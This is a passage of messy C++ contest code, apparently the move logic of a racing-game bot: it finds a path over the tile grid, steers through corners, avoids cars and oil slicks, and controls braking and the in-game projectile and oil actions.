getDirectionByAngle(self.getAngle());\r\n pd = d;\r\n#ifdef debug\r\n cout << self.getAngle() << \" ANGLE \" << pd << \" \" << d << \"\\n\";\r\n writeln(world.getWaypoints());\r\n#endif\r\n srand(game.getRandomSeed());\r\n }\r\n int waypointIndex = self.getNextWaypointIndex();\r\n int qx = self.getX() / tileSize;\r\n int qy = self.getY() / tileSize;\r\n int wx, wy;\r\n tie(wx, wy) = old.back();\r\n if (wx != qx || wy != qy)\r\n {\r\n //cout << wx << \" \" << wy << \" \" << qx << \" \" << qy << \" \" << pd << \" \" << d << \"\\n\";\r\n old[0] = {qx, qy};\r\n pd = d;\r\n d = directions[make_pair(qx - wx, qy - wy)];\r\n //int tqwer = getDirectionByAngle(self.getAngle());\r\n if (pd != d && a[self.getNextWaypointX()][self.getNextWaypointY()] != UNKNOWN && waypointIndex != 0)\r\n FU = FUUUUU;\r\n //if (tqwer != -1)\r\n //d = tqwer;\r\n //if (forceBack)\r\n //d = opposite(d);\r\n }\r\n\r\n prevx = currx;\r\n if (prevx == -1234)\r\n prevx = self.getX();\r\n currx = self.getX();\r\n if (currx - prevx != 0)\r\n changed = true;\r\n int ti = self.getNextWaypointX();\r\n int tj = self.getNextWaypointY();\r\n auto wp = world.getWaypoints();\r\n for (int i = 0; i < min(3, int(wp.size())); ++i)\r\n wp.push_back(wp[i]);\r\n int fi, fj, pi, pj;\r\n double speedModule = hypot(self.getSpeedX(), self.getSpeedY());\r\n //if (waypointIndex < int(wp.size()) - 1)\r\n //{\r\n //int cx = int(self.getX() / tileSize);\r\n //int cy = int(self.getY() / tileSize);\r\n //int wx1 = wp[waypointIndex][0];\r\n //int wx2 = wp[waypointIndex + 1][0];\r\n //int wy1 = wp[waypointIndex][1];\r\n //int wy2 = wp[waypointIndex + 1][1];\r\n //if (\r\n //(cx == wx1 && cx == wx2 && ((cy < wy1 && wy1 < wy2) || (cy > wy1 && wy1 > wy2)))\r\n //||\r\n //(cy == wy1 && cy == wy2 && ((cx < wx1 && wx1 < wx2) || (cx > wx1 && wx1 > wx2)))\r\n //)\r\n //ti = wp[++waypointIndex][0],\r\n //tj = wp[waypointIndex][1];\r\n //if (waypointIndex + 1 < int(wp.size()))\r\n //fi = wp[waypointIndex + 1][0],\r\n //fj = wp[waypointIndex + 1][1];\r\n //}\r\n double targetX = getCenter(ti);\r\n double targetY = getCenter(tj);\r\n int si = self.getX() / tileSize;\r\n int sj = self.getY() / tileSize;\r\n pair<int, int> S = make_pair(si, sj);\r\n visited[si][sj] = true;\r\n vector<int> qwerqsdfgsdf = {si, sj};\r\n if (wp[max(0, self.getNextWaypointIndex() - 1)] == qwerqsdfgsdf && !once[si][sj])\r\n {\r\n once[si][sj] = true;\r\n for (int i = 0; i < visited.size(); ++i)\r\n for (int j = 0; j < visited[0].size(); ++j)\r\n visited[i][j] = false;\r\n }\r\n if (bad.find(S) == bad.end())\r\n bad.clear();\r\n int n = a.size();\r\n int m = a[0].size();\r\n auto ok = [&](int x, int N)\r\n {\r\n return x >= 0 && x < N;\r\n };\r\n\r\n auto getPath = [&](int si, int sj, int tti, int ttj, int pd, int dd, vector<vector<vector<int>>> FUUUUU)\r\n {\r\n#ifdef debug\r\n writeln(\"GET\", si, sj, tti, ttj, waypointIndex);\r\n#endif\r\n auto fffpath = [](int si, int sj, int u, int v, vector<vector<pair<int, int>>> prev)\r\n {\r\n vector<pair<int, int>> path;\r\n while (u != si || v != sj)\r\n path.push_back({u, v}),\r\n tie(u, v) = prev[u][v];\r\n path.push_back({si, sj});\r\n reverse(path.begin(), path.end());\r\n return path;\r\n };\r\n auto bfs = [&](int si, int sj, int tti, int ttj, int pd, int dd, vector<vector<vector<int>>> FUUUUU)\r\n {\r\n queue<vertex> q;\r\n q.push(vertex(si, sj, pd, dd));\r\n vector<vector<int>> d(n, vector<int>(m, 10000));\r\n vector<vector<pair<int, int>>> prev(n, vector<pair<int, int>>(m));\r\n d[si][sj] = 0;\r\n int u, v, prevD, prevprevD;\r\n while (q.size())\r\n {\r\n u = q.front().x;\r\n v = q.front().y;\r\n prevD = q.front().qd;\r\n prevprevD = q.front().qpd;\r\n q.pop();\r\n if (a[u][v] == UNKNOWN)\r\n continue;\r\n vector<int> dx;\r\n vector<int> dy;\r\n for (int i = 0; i < 4; ++i)\r\n dx.push_back(ddx[FUUUUU[prevprevD][prevD][i]]),\r\n dy.push_back(ddy[FUUUUU[prevprevD][prevD][i]]);\r\n for (int i = 0; i < 4; ++i)\r\n {\r\n auto iAmIdiot = directions[make_pair(dx[i], dy[i])];\r\n if (ok(u + dx[i], n) && ok(v + dy[i], m) && a[u][v] != UNKNOWN && dir[a[u][v]][iAmIdiot] && (dx[i] != 0 || dy[i] != 0))\r\n {\r\n int isReverse = opposite(prevD, iAmIdiot);\r\n int isShpilka = opposite(prevprevD, iAmIdiot);\r\n int temp = d[u][v] + 1 + isShpilka * 3 + isReverse * 6;\r\n if (d[u + dx[i]][v + dy[i]] > temp)\r\n {\r\n d[u + dx[i]][v + dy[i]] = temp;\r\n prev[u + dx[i]][v + dy[i]] = {u, v};\r\n q.push(vertex(u + dx[i], v + dy[i], prevD, iAmIdiot));\r\n }\r\n }\r\n }\r\n }\r\n return make_pair(d, prev);\r\n };\r\n auto qqwerwer = bfs(si, sj, ti, tj, pd, d, FUUUUU);\r\n auto d = qqwerwer.first;\r\n int u, v;\r\n auto prev = qqwerwer.second;\r\n {\r\n u = tti;\r\n v = ttj;\r\n //ppp(d);\r\n int known = 10000;\r\n if (d[tti][ttj] != 10000)\r\n known = fffpath(si, sj, tti, ttj, bfs(si, sj, tti, ttj, pd, dd, FUUUUU).second).size();\r\n int ytrewq = d[tti][ttj] == 10000 || (known / 2 > (abs(si - tti) + abs(sj + ttj)));\r\n if (ytrewq)\r\n {\r\n int indexi = -1;\r\n int indexj = -1;\r\n int mn = 11234123;\r\n for (int i = 0; i < d.size(); ++i)\r\n for (int j = 0; j < d[0].size(); ++j)\r\n if (d[i][j] < 10000)\r\n {\r\n int length = fffpath(si, sj, i, j, bfs(si, sj, i, j, pd, dd, FUUUUU).second).size();\r\n bool hasGoodNeighbor = false;\r\n for (int dx = -1; dx < 2; ++dx)\r\n for (int dy = -1; dy < 2; ++dy)\r\n if (abs(dx + dy) == 1)\r\n hasGoodNeighbor |= ok(i + dx, a.size()) && ok(j + dy, a[0].size()) && a[i + dx][j + dy] == UNKNOWN;\r\n#ifdef vis\r\n if (hasGoodNeighbor)\r\n visual.fillCircle(getCenter(i), getCenter(j), 50, 0xff00ff);\r\n else\r\n visual.fillCircle(getCenter(i), getCenter(j), 50, 0x00ffff);\r\n#endif\r\n int gamno = abs(i - tti) + abs(j - ttj) + length;\r\n if ((gamno < mn || (gamno == mn && abs(si - i) + abs(sj - j) < abs(si - indexi) + abs(sj - indexj))) && !visited[i][j] && hasGoodNeighbor)\r\n mn = gamno,\r\n indexi = i,\r\n indexj = j;\r\n }\r\n if (indexi == -1)\r\n cout << \"FAAAAAAAAAAAAAIL\\n\";\r\n else\r\n //cout << \"indices == \" << indexi << \" \" << indexj << \"\\n\",\r\n u = ti = indexi,\r\n v = tj = indexj,\r\n#ifdef vis\r\n visual.fillCircle(getCenter(tti), getCenter(ttj), 600, 0x555555),\r\n#endif\r\n targetX = getCenter(ti),\r\n targetY = getCenter(tj);\r\n }\r\n auto path = fffpath(si, sj, u, v, prev);\r\n if (ytrewq)\r\n path.push_back({-1, -1});\r\n return path;\r\n }\r\n return vector<pair<int, int>>(0);\r\n };\r\n vector<pair<int, int>> path;\r\n int qqq = ti;\r\n int www = tj;\r\n path = getPath(si, sj, ti, tj, pd, d, FU);\r\n for (int i = 0; i + 4 < min(7, int(path.size())); ++i)\r\n if (\r\n (\r\n isVertical(path[i + 0], path[i + 1]) &&\r\n isVertical(path[i + 2], path[i + 3]) &&\r\n isHorizontal(path[i + 0], path[i + 3]) &&\r\n isHorizontal(path[i + 1], path[i + 2])\r\n )\r\n ||\r\n (\r\n isHorizontal(path[i + 0], path[i + 1]) &&\r\n isHorizontal(path[i + 2], path[i + 3]) &&\r\n isVertical(path[i + 0], path[i + 3]) &&\r\n isVertical(path[i + 1], path[i + 2])\r\n )\r\n )\r\n {\r\n path = getPath(si, sj, qqq, www, pd, d, goforward);\r\n break;\r\n }\r\n //cout << \"RAW PATH = \\n\" << path;\r\n int ai, aj, bi, bj, ci, cj, di, dj;\r\n auto banana = path.back();\r\n if (banana.first == -1)\r\n path.pop_back();\r\n else\r\n while (waypointIndex + 1 < int(wp.size()))\r\n {\r\n banana = path.back();\r\n if (banana.first == -1)\r\n path.pop_back();\r\n int t = 0;\r\n int y = 0;\r\n auto zxcv = path.back();\r\n auto asdf = path.back();\r\n auto qwer = path.back();\r\n if (path.size() >= 2)\r\n asdf = path[path.size() - 2];\r\n if (path.size() >= 3)\r\n zxcv = path[path.size() - 3];\r\n t = directions[make_pair(asdf.first - zxcv.first, asdf.second - zxcv.second)];\r\n y = directions[make_pair(qwer.first - asdf.first, qwer.second - asdf.second)];\r\n if (path.size() < 3)\r\n t = d;\r\n int q = wp[waypointIndex][0];\r\n int w = wp[waypointIndex][1];\r\n int e = wp[waypointIndex + 1][0];\r\n int r = wp[waypointIndex + 1][1];\r\n auto temp = getPath(q, w, e, r, t, y, FU);\r\n banana = temp.back();\r\n if (banana.first == -1)\r\n temp.pop_back();\r\n if (temp.size() <= 1)\r\n break;\r\n for (auto x : temp)\r\n path.push_back(x);\r\n waypointIndex++;\r\n }\r\n for (int i = 1; i < int(path.size()); ++i)\r\n if (path[i] == path[i - 1])\r\n path.erase(path.begin() + --i);\r\n //for (int i = 0; i + 5 < int(path.size()); ++i)\r\n //{\r\n //auto s = path[i];\r\n //auto d = path[i + 1];\r\n //auto f = path[i + 2];\r\n //auto g = path[i + 3];\r\n //auto h = path[i + 4];\r\n //auto j = path[i + 5];\r\n //if (isDownTo(s, d) && isDownTo(d, f) && isLeftTo(f, g) && isLeftTo(g, h) && !isDownTo(h, j) && dir[a[d.first][d.second]][RIGHT] && dir[a[g.first][g.second]][DOWN])\r\n //cout << \"EPIC WIN\\n\",\r\n //path[i + 2] = {d.first + 1, d.second};\r\n //if (isDownTo(s, d) && isDownTo(d, f) && isLeftTo(f, g) && isLeftTo(g, h) && !isDownTo(h, j) && dir[a[d.first][d.second]][RIGHT] && dir[a[g.first][g.second]][DOWN])\r\n //path[i + 2] = {d.first + 1, d.second};\r\n\r\n //}\r\n auto checkBonus = path;\r\n for (int i = 1; i < int(path.size()) - 1; ++i)\r\n if ((abs(path[i + 1].first - path[i - 1].first) == 1 && abs(path[i + 1].second - path[i - 1].second) == 1) || path[i - 1] == path[i + 1])\r\n {\r\n#ifdef debug\r\n if (debug)\r\n {\r\n vector<string> xxx(m);\r\n for (int i = 0; i < m; ++i)\r\n for (int j = 0; j < n; ++j)\r\n xxx[i].push_back('.');\r\n for (int i = 0; i < path.size(); ++i)\r\n xxx[path[i].second][path[i].first] = i + 48;\r\n xxx[sj][si] = 'S';\r\n xxx[path[i].second][path[i].first] = 'X';\r\n xxx[tj][ti] = 'F';\r\n //ppp(d);\r\n //writeln();\r\n //writeln(xxx);\r\n //writeln();\r\n }\r\n#endif\r\n //fi = ti;\r\n //fj = tj;\r\n tie(ti, tj) = path[i];\r\n targetX = getCenter(path[i].first);//(path[i].first + 0.5) * tileSize;\r\n targetY = getCenter(path[i].second);//(path[i].second + 0.5) * tileSize;\r\n break;\r\n }\r\n#ifdef debug\r\n wr(path);\r\n //cout.flush();\r\n#endif\r\n if (path.size() >= 3)\r\n {\r\n tie(ai, aj) = path[0];\r\n tie(bi, bj) = path[1];\r\n tie(ci, cj) = path[2];\r\n }\r\n if (path.size() >= 4) //SNAKE\r\n {\r\n tie(di, dj) = path[3];\r\n snake = true;\r\n if (\r\n (ai + 1 == ci && aj - 1 == cj && bi + 1 == di && bj - 1 == dj)\r\n || (ai - 1 == ci && aj + 1 == cj && bi - 1 == di && bj + 1 == dj)\r\n || (ai + 1 == ci && aj + 1 == cj && bi + 1 == di && bj + 1 == dj)\r\n || (ai - 1 == ci && aj - 1 == cj && bi - 1 == di && bj - 1 == dj)\r\n )\r\n tie(targetX, targetY) = getXX(path[1], path[2]);\r\n else\r\n {\r\n drift = true;\r\n snake = false;\r\n if (\r\n (\r\n isVertical(path[0], path[1]) &&\r\n isVertical(path[2], path[3]) &&\r\n isHorizontal(path[0], path[3]) &&\r\n isHorizontal(path[1], path[2])\r\n )\r\n ||\r\n (\r\n isHorizontal(path[0], path[1]) &&\r\n isHorizontal(path[2], path[3]) &&\r\n isVertical(path[0], path[3]) &&\r\n isVertical(path[1], path[2])\r\n )\r\n )\r\n {\r\n bad.insert(path[1]);\r\n if (d != directions[make_pair(path[1].first - path[0].first, path[1].second - path[0].second)])\r\n bad.insert(path[0]);\r\n bad.insert(path[2]);\r\n //if (self.getDistanceTo(getCenter(path[1].first), getCenter(path[1].second)) < tileSize)\r\n tie(targetX, targetY) = getCorner(path[0], path[1], path[2]);\r\n }\r\n else\r\n drift = false;\r\n }\r\n } else\r\n drift = false,\r\n snake = false;\r\n double temp = self.getDistanceTo(targetX, targetY);\r\n double temp2 = temp / tileSize;\r\n prevDistance = distToNext;\r\n distToNext = temp;\r\n auto interpolation = [&](double x)\r\n {\r\n return + 5.28596 * pow(x, 8) - 49.1259 * pow(x, 7) + 189.037 * pow(x, 6) - 388.625 * pow(x, 5) + 458.98 * pow(x, 4) - 310.246 * pow(x, 3) + 110.424 * pow(x, 2) - 15.6552 * pow(x, 1) + 0.2;//идеально при малой скорости\r\n return + 7.16332 * pow(x, 8) - 67.0616 * pow(x, 7) + 260.855 * pow(x, 6) - 544.344 * pow(x, 5) + 655.525 * pow(x, 4) - 453.69 * pow(x, 3) + 165.888 * pow(x, 2) - 24.2604 * pow(x, 1) + 0.2; //хреново входит в поворот\r\n return + 1.68041 * pow(x, 7) - 14.0981 * pow(x, 6) + 47.7581 * pow(x, 5) - 82.7825 * pow(x, 4) + 76.7515 * pow(x, 3) - 36.3308 * pow(x, 2) + 7.15476 * pow(x, 1)\r\n + 0.2; //на скорости влезает, но задевает угол ~-2\r\n return - 0.57084 * pow(x, 10) + 10.9758 * pow(x, 9) - 91.814 * pow(x, 8) + 438.632 * pow(x, 7) - 1320.67 * pow(x, 6) + 2608.54 * pow(x, 5) - 3408.95 * pow(x, 4) + 2898.79 * pow(x, 3) - 1530.02 * pow(x, 2) + 451.546 * pow(x, 1) - 56.1279; //шикарно в большие повороты\r\n };\r\n double MAAAAAGIC = interpolation(temp2);\r\n if (temp2 > 2)\r\n MAAAAAGIC = -0.25;\r\n if (temp2 < 0.6)\r\n MAAAAAGIC = interpolation(0.6);\r\n bool found = false;\r\n for (int i = 0; i < int(path.size()); ++i)\r\n if (path[i].first == ti && path[i].second == tj)\r\n {\r\n pi = path[max(0, i - 1)].first;\r\n pj = path[max(0, i - 1)].second;\r\n fi = path[min(int(path.size()) - 1, i + 1)].first;\r\n fj = path[min(int(path.size()) - 1, i + 1)].second;\r\n found = true;\r\n break;\r\n }\r\n double nextWaypointX = targetX;\r\n double nextWaypointY = targetY;\r\n\r\n double cornerTileOffset = MAAAAAGIC * tileSize;\r\n //auto pathtitj = getPath(ti, tj, fi, fj);\r\n //if (pathtitj.size() >= 2)\r\n //fi = pathtitj[1].first,\r\n //fj = pathtitj[1].second;\r\n //else\r\n //fi = ti,\r\n //fj = tj;\r\n#ifdef debug\r\n wr(si, sj, pi, pj, ti, tj, fi, fj);\r\n cout.flush();\r\n //writeln(pathtitj);\r\n //writeln();\r\n#endif\r\n auto changeCoords = [&](int i, int j) {\r\n if (snake || drift)\r\n return;\r\n if (pj == tj)\r\n swap(pi, fi),\r\n swap(pj, fj);\r\n switch (a[i][j]) \r\n {\r\n case LEFT_TOP_CORNER:\r\n lt:\r\n //a[i][j] = LEFT_TOP_CORNER;\r\n nextWaypointX += cornerTileOffset;\r\n nextWaypointY += cornerTileOffset;\r\n break;\r\n case RIGHT_TOP_CORNER:\r\n rt:\r\n //a[i][j] = RIGHT_TOP_CORNER;\r\n nextWaypointX -= cornerTileOffset;\r\n nextWaypointY += cornerTileOffset;\r\n break;\r\n case LEFT_BOTTOM_CORNER:\r\n lb:\r\n //a[i][j] = LEFT_BOTTOM_CORNER;\r\n nextWaypointX += cornerTileOffset;\r\n nextWaypointY -= cornerTileOffset;\r\n break;\r\n case RIGHT_BOTTOM_CORNER:\r\n rb:\r\n //a[i][j] = RIGHT_BOTTOM_CORNER;\r\n nextWaypointX -= cornerTileOffset;\r\n nextWaypointY -= cornerTileOffset;\r\n break;\r\n case TOP_HEADED_T:\r\n th:\r\n if (pj == tj && pj == fj);\r\n else\r\n go(fi + 1 == ti, rb, lb);\r\n break;\r\n case BOTTOM_HEADED_T:\r\n bh:\r\n if (pj == tj && pj == fj);\r\n else\r\n go(fi + 1 == ti, rt, lt);\r\n break;\r\n case RIGHT_HEADED_T:\r\n if (pi == ti && pi == fi);\r\n else\r\n go(pj + 1 == tj, lb, lt);\r\n break;\r\n case LEFT_HEADED_T:\r\n if (pi == ti && pi == fi);\r\n else\r\n go(pj + 1 == tj, rb, rt);\r\n break;\r\n case CROSSROADS:\r\n if (pi == ti && pi == fi);\r\n else if (pj == tj && pj == fj);\r\n else go(pj + 1 == tj, th, bh);\r\n default:\r\n break;\r\n }\r\n };\r\n changeCoords(ti, tj);\r\n bool B = false;\r\n double bonusMin = 1000000;\r\n Bonus bonus;\r\n if (!snake && self.getRemainingNitroTicks() == 0 && !drift)\r\n for (Bonus b : world.getBonuses())\r\n if (self.getDistanceTo(b) < distToNext)\r\n if ((b.getDistanceTo(targetX, targetY) > tileSize * 2 && fabs(self.getAngleTo(b)) < PI / 27) && fabs(self.getAngleTo(targetX, targetY) < PI / 36) && self.getDistanceTo(b) > tileSize)\r\n {\r\n pair<int, int> bbb = {b.getX() / tileSize, b.getY() / tileSize};\r\n pair<int, int> qwerty = {ti, tj};\r\n for (auto point : path)\r\n {\r\n if (point == qwerty)\r\n break;\r\n if (point == bbb)\r\n {\r\n B = true;\r\n if (bonusMin > self.getDistanceTo(b))\r\n bonus = b,\r\n bonusMin = self.getDistanceTo(b);\r\n }\r\n }\r\n }\r\n if (B)\r\n {\r\n pair<int, int> bbb = {bonus.getX() / tileSize, bonus.getY() / tileSize};\r\n nextWaypointX = bonus.getX();\r\n nextWaypointY = bonus.getY();\r\n nextWaypointX = min(nextWaypointX, get(bbb.first + 1) - height - bonus.getWidth() / 2 - 78);\r\n nextWaypointX = max(nextWaypointX, get(bbb.first) + height + bonus.getWidth() / 2 + 78);\r\n nextWaypointY = min(nextWaypointY, get(bbb.second + 1) - height - bonus.getHeight() / 2 - 78);\r\n nextWaypointY = max(nextWaypointY, get(bbb.second) + height + bonus.getHeight() / 2 + 78);\r\n }\r\n if (is32(path))\r\n tie(nextWaypointX, nextWaypointY) = make_pair(getCenter(path[2].first), getCenter(path[2].second));\r\n\r\n auto cars = world.getCars();\r\n sort(cars.begin(), cars.end(), [&self](const Car& aaa, const Car& bbb) { return self.getDistanceTo(aaa) < self.getDistanceTo(bbb);});\r\n for (Car car : world.getCars())\r\n if (!car.isFinishedTrack() && !car.isTeammate())\r\n if (hypot(car.getSpeedX(), car.getSpeedY()) * 1.2 < speedModule || fabs(car.getAngleTo(self)) < PI / 2 || speedModule < 10 && world.getTick() > 300)\r\n {\r\n pair<int, int> ccc = {car.getX() / tileSize, car.getY() / tileSize};\r\n pair<int, int> qwerty = {ti, tj};\r\n int index = 0;\r\n for (auto point : path)\r\n {\r\n if (point == qwerty)\r\n break;\r\n if (point == ccc && index + 1 < int(path.size()) && (self.getDistanceTo(car) > tileSize || speedModule < 10))\r\n {\r\n if (isHorizontal(point, path[index + 1]))\r\n {\r\n if (targetX <= self.getX() && self.getX() <= car.getX() || targetX >= self.getX() && self.getX() >= car.getX())\r\n continue;\r\n double lower = get(ccc.second) + 80 + height + 15;\r\n double lower2 = car.getY() - height - 15 - car.getWidth();\r\n double upper = get(ccc.second + 1) - 80 - height - 15;\r\n double upper2 = car.getY() + height + 15 + car.getWidth();\r\n double cgy = car.getY();\r\n double dist1 = self.getDistanceTo(car.getX(), lower) + hypot(nextWaypointX - car.getX(), nextWaypointY - lower);\r\n double dist2 = self.getDistanceTo(car.getX(), lower2) + hypot(nextWaypointX - car.getX(), nextWaypointY - lower2);\r\n double dist3 = self.getDistanceTo(car.getX(), upper) + hypot(nextWaypointX - car.getX(), nextWaypointY - upper);\r\n double dist4 = self.getDistanceTo(car.getX(), upper2) + hypot(nextWaypointX - car.getX(), nextWaypointY - upper2);\r\n nextWaypointX = car.getX();\r\n nextWaypointY = (cgy - lower > upper - cgy) ? (dist1 < dist2 ? lower : lower2) : (dist3 < dist4 ? upper : upper2);\r\n }\r\n if (isVertical(point, path[index + 1]))\r\n {\r\n if (targetY <= self.getY() && self.getY() <= car.getY() || targetY >= self.getY() && self.getY() >= car.getY())\r\n continue;\r\n double lower = get(ccc.first) + 80 + height + 15;\r\n double lower2 = car.getX() - height - 15 - car.getWidth();\r\n double upper = get(ccc.first + 1) - 80 - height - 15;\r\n double upper2 = car.getX() + height + 15 + car.getWidth();\r\n double cgy = car.getX();\r\n double dist1 = self.getDistanceTo(car.getY(), lower) + hypot(nextWaypointY - car.getY(), nextWaypointX - lower);\r\n double dist2 = self.getDistanceTo(car.getY(), lower2) + hypot(nextWaypointY - car.getY(), nextWaypointX - lower2);\r\n double dist3 = self.getDistanceTo(car.getY(), upper) + hypot(nextWaypointY - car.getY(), nextWaypointX - upper);\r\n double dist4 = self.getDistanceTo(car.getY(), upper2) + hypot(nextWaypointY - car.getY(), nextWaypointX - upper2);\r\n nextWaypointY = car.getY();\r\n nextWaypointX = (cgy - lower > upper - cgy) ? (dist1 < dist2 ? lower : lower2) : (dist3 < dist4 ? upper : upper2);\r\n }\r\n break;\r\n }\r\n ++index;\r\n }\r\n\r\n }\r\n auto os = world.getOilSlicks();\r\n sort(os.begin(), os.end(), [&self](const OilSlick& aaa, const OilSlick& bbb) { return self.getDistanceTo(aaa) < self.getDistanceTo(bbb);});\r\n for (auto o : os)\r\n {\r\n pair<int, int> ccc = {o.getX() / tileSize, o.getY() / tileSize};\r\n pair<int, int> qwerty = {ti, tj};\r\n int index = 0;\r\n for (auto point : path)\r\n {\r\n if (point == qwerty)\r\n break;\r\n if (point == ccc && index + 1 < int(path.size()) && self.getDistanceTo(o) > tileSize && self.getDistanceTo(o) < self.getDistanceTo(nextWaypointX, nextWaypointY))\r\n {\r\n if (isHorizontal(point, path[index + 1]))\r\n {\r\n if (targetX <= self.getX() && self.getX() <= o.getX() || targetX >= self.getX() && self.getX() >= o.getX())\r\n continue;\r\n double lower = get(ccc.second) + 80 + height + 15;\r\n double lower2 = o.getY() - height - 15 - o.getRadius();\r\n double upper = get(ccc.second + 1) - 80 - height - 15;\r\n double upper2 = o.getY() + height + 15 + o.getRadius();\r\n double cgy = o.getY();\r\n double dist1 = self.getDistanceTo(o.getX(), lower) + hypot(nextWaypointX - o.getX(), nextWaypointY - lower);\r\n double dist2 = self.getDistanceTo(o.getX(), lower2) + hypot(nextWaypointX - o.getX(), nextWaypointY - lower2);\r\n double dist3 = self.getDistanceTo(o.getX(), upper) + hypot(nextWaypointX - o.getX(), nextWaypointY - upper);\r\n double dist4 = self.getDistanceTo(o.getX(), upper2) + hypot(nextWaypointX - o.getX(), nextWaypointY - upper2);\r\n nextWaypointX = o.getX();\r\n nextWaypointY = (cgy - lower > upper - cgy) ? (dist1 < dist2 ? lower : lower2) : (dist3 < dist4 ? upper : upper2);\r\n }\r\n if (isVertical(point, path[index + 1]))\r\n {\r\n if (targetY <= self.getY() && self.getY() <= o.getY() || targetY >= self.getY() && self.getY() >= o.getY())\r\n continue;\r\n double lower = get(ccc.first) + 80 + height + 15;\r\n double lower2 = o.getX() - height - 15 - o.getRadius();\r\n double upper = get(ccc.first + 1) - 80 - height - 15;\r\n double upper2 = o.getX() + height + 15 + o.getRadius();\r\n double cgy = o.getX();\r\n double dist1 = self.getDistanceTo(o.getY(), lower) + hypot(nextWaypointY - o.getY(), nextWaypointX - lower);\r\n double dist2 = self.getDistanceTo(o.getY(), lower2) + hypot(nextWaypointY - o.getY(), nextWaypointX - lower2);\r\n double dist3 = self.getDistanceTo(o.getY(), upper) + hypot(nextWaypointY - o.getY(), nextWaypointX - upper);\r\n double dist4 = self.getDistanceTo(o.getY(), upper2) + hypot(nextWaypointY - o.getY(), nextWaypointX - upper2);\r\n nextWaypointY = o.getY();\r\n nextWaypointX = (cgy - lower > upper - cgy) ? (dist1 < dist2 ? lower : lower2) : (dist3 < dist4 ? upper : upper2);\r\n }\r\n break;\r\n }\r\n ++index;\r\n }\r\n\r\n }\r\n\r\n double angleToWaypoint = self.getAngleTo(nextWaypointX, nextWaypointY);\r\n //double check = self.getAngleTo(getCenter(ti), getCenter(tj));\r\n //if ((fabs(check - PI) < PI / 6 || fabs(check + PI) < PI / 6) && planB == 0)\r\n //planB = PLANB,\r\n //power *= -1;\r\n //if (fabs(check) < PI / 3 && planB)\r\n //power *= -1,\r\n //planB = 0;\r\n auto getTurn = [&](double d)\r\n {\r\n return angleToWaypoint * d * pow(DIST_TO_NEXT / distToNext, 0.8) / PI;\r\n };\r\n if (forceBack)\r\n {\r\n forceBack--;\r\n if (forceBack == 0)\r\n {\r\n power *= -1;\r\n forceRight = FORCE_RIGHT;\r\n turn *= -1;\r\n }\r\n }\r\n\r\n else if (forceRight)\r\n {\r\n if (forceRight > FORCE_RIGHT - BREAK)\r\n move.setBrake(true);\r\n forceRight--;\r\n if (forceRight == 0)\r\n force = FORCE;\r\n } \r\n if (forceBack == 0 && forceRight == 0)\r\n {\r\n if (changed && fabs(prevDistance - distToNext) < eps)\r\n {\r\n countOfFails++;\r\n {\r\n if (countOfFails > COUNT_OF_FAILS)\r\n {\r\n globalFail++;\r\n countOfFails = 0;\r\n //if (planB)\r\n //planB = 0,\r\n //power *= -1,\r\n //forceRight = FORCE_RIGHT;\r\n //else\r\n forceBack = FORCE_BACK;\r\n turn = getTurn(32);\r\n if (isCorner(a[si][sj]))\r\n {\r\n //cout << \"CORNER\";\r\n turn = turn > 0 ? 1 : -1;\r\n if (globalFail > GLOBAL_FAIL)\r\n //cout << \"GLOBAL_FAIL\",\r\n turn *= -1;\r\n }\r\n else\r\n if (globalFail > GLOBAL_FAIL)\r\n //cout << \"NOT CORNER GLOBAL_FAIL\",\r\n turn = turn > 0 ? 1 : -1;\r\n turn *= -1;\r\n power *= -1;\r\n }\r\n }\r\n //else\r\n //if (countOfFails > COUNT_OF_FAILS / 5)\r\n //{\r\n //forceRight = 0;\r\n //force = 0;\r\n //countOfFails = COUNT_OF_FAILS;\r\n //}\r\n }\r\n else\r\n {\r\n if (force)\r\n force--;\r\n forceSlow = path.size() <= 4 ? 14 : 100;\r\n if (is4(path))\r\n forceSlow *= 1.5;\r\n countOfFails = 0;\r\n globalFail = 0;\r\n\r\n if (forceRight == 0)\r\n turn = getTurn(36);\r\n double dd = speedModule / MAX_SPEED;\r\n if (is32(path))\r\n dd *= 1.3;\r\n if (is3_2(path))\r\n dd /= 2;\r\n if (is212(path))\r\n dd /= 2;\r\n if (is41(path))\r\n dd *= 1.2;\r\n bool fas = is131(path) && speedModule > 16.5;\r\n //cout << si << \" \" << sj << \" \" << badX << \" \" << badY << \"\\n\";\r\n if ((!snake && distToNext < tileSize * dd && distToNext > tileSize && bad.find(S) == bad.end()) || speedModule > forceSlow || (bad.find(S) != bad.end() && speedModule > 11) || fas)\r\n move.setBrake(true);\r\n }\r\n }\r\n //cout << \"END OF MOVE\\n\";\r\n //cout.flush();\r\n //else\r\n //if (changed && fabs(prevDistance - distToNext) < eps)\r\n //{\r\n //countOfFails++;\r\n //if (countOfFails > COUNT_OF_FAILS / 3)\r\n //forceRight = FORCE_RIGHT;\r\n //}\r\n //else\r\n //countOfFails = 0;\r\n if (forceRight == 0 && forceBack == 0 && planB)\r\n {\r\n if (angleToWaypoint > 0)\r\n angleToWaypoint = PI - angleToWaypoint;\r\n else\r\n angleToWaypoint = -PI + angleToWaypoint;\r\n turn = getTurn(32);\r\n //cout << \"PLANB\\n\";\r\n }\r\n move.setWheelTurn(turn);\r\n move.setEnginePower(power);\r\n for (auto car : world.getCars())\r\n if (!car.isTeammate())\r\n {\r\n if (world.getTick() > 250 && self.getDistanceTo(car) <= tileSize * 2)\r\n {\r\n if (fabs(self.getAngleTo(car)) < ANGLE_THROW && car.getDurability() > 0 && !car.isFinishedTrack())\r\n move.setThrowProjectile(true);\r\n }\r\n if (self.getDistanceTo(car) <= tileSize * 6 && isCorner(a[si][sj]) && planB == 0)\r\n move.setSpillOil(true);\r\n }\r\n //if (world.getTick() > 210 && distToNext > prevDistance)\r\n //{\r\n //forceSlow = FORCE_SLOW_DOWN;\r\n //if (distToNext > tileSize * 5)\r\n //forceSlow /= 2;\r\n //}\r\n bool okSnake = false;\r\n if (snake && path.size() >= 2)\r\n {\r\n int count = 0;\r\n vector<int> fff = {\r\n directions[make_pair(path[0].first - path[1].first, path[0].second - path[1].second)],\r\n directions[make_pair(path[1].first - path[2].first, path[1].second - path[2].second)]\r\n };\r\n for (int i = 2; i < path.size(); ++i)\r\n if (directions[make_pair(path[i].first - path[i + 1].first, path[i].second - path[i + 1].second)] == fff[i % 2])\r\n count++;\r\n else\r\n break;\r\n //cout << count << \"\\n\";\r\n okSnake = count >= 9;\r\n }\r\n if (forceRight == 0 && forceBack == 0 && world.getTick() > 195 && (distToNext > tileSize * 5 || (okSnake && bad.find(S) == bad.end() && speedModule > 20)) && planB == 0)\r\n 